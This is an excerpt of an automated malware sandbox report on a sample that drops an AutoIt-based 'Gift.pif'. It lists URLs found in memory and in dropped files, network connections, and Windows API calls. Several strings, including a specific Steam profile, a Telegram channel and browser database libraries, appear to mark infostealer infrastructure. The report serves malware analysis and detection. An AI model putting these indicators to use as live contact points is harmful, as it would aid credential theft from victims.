                        Source: Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                        Source: DHCBGD.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: DHCBGD.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: DHCBGD.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=zGRpBs82SFHJ&a
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=GG0UCGgA
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=Dbzy
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=Q4LAS9-JZwft&l=e
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                        Source: Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                        Source: DHCBGD.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: DHCBGD.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: DHCBGD.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://help.steampowered.com/en/
                        Source: AFHDGD.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drString found in binary or memory: https://mozilla.org0/
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/discussions/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                        Source: 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/market/
                        Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000046BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
Source: Gift.pif, 0000000B.00000002.3217806128.00000000046BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259E
Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | String found in binary or memory: https://steamcommunity.com/workshop/
Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.c
Source: 76561199747278259[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/
Source: 76561199747278259[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/about/
Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/explore/
Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/legal/
Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/mobile
Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/news/
Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/points/shop/
Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/stats/
Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: FBAAAK.11.dr | String found in binary or memory: https://support.mozilla.org
Source: FBAAAK.11.dr | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FBAAAK.11.dr | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/armad2a
Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
Source: Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.dr | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Gift.pif, 0000000B.00000002.3226364575.000000001295A000.00000004.00000800.00020000.00000000.sdmp, AFHDGD.11.dr | String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: DHCBGD.11.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: Gift.pif.2.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: lem.exe, 00000000.00000003.2024634817.0000000002936000.00000004.00000020.00020000.00000000.sdmp, Appendix.0.dr, Gift.pif.2.dr | String found in binary or memory: https://www.globalsign.com/repository/06
Source: DHCBGD.11.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: FBAAAK.11.dr | String found in binary or memory: https://www.mozilla.org
Source: Gift.pif, 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/
Source: FBAAAK.11.dr | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Gift.pif, 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/
Source: FBAAAK.11.dr | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Gift.pif, 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: Gift.pif, 0000000B.00000003.2865855331.0000000012734000.00000004.00000800.00020000.00000000.sdmp, FBAAAK.11.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Gift.pif, 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: FBAAAK.11.dr | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Gift.pif, 0000000B.00000003.2865855331.0000000012734000.00000004.00000800.00020000.00000000.sdmp, FBAAAK.11.dr | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Gift.pif, 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: Gift.pif, 0000000B.00000003.2865855331.0000000012734000.00000004.00000800.00020000.00000000.sdmp, FBAAAK.11.dr | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Gift.pif, 0000000B.00000002.3217998328.0000000004718000.00000040.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3217421191.0000000001660000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.11.dr | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: unknown | HTTPS traffic detected: 104.102.49.249:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.245.87.202:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: C:\Users\user\Desktop\lem.exe | Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
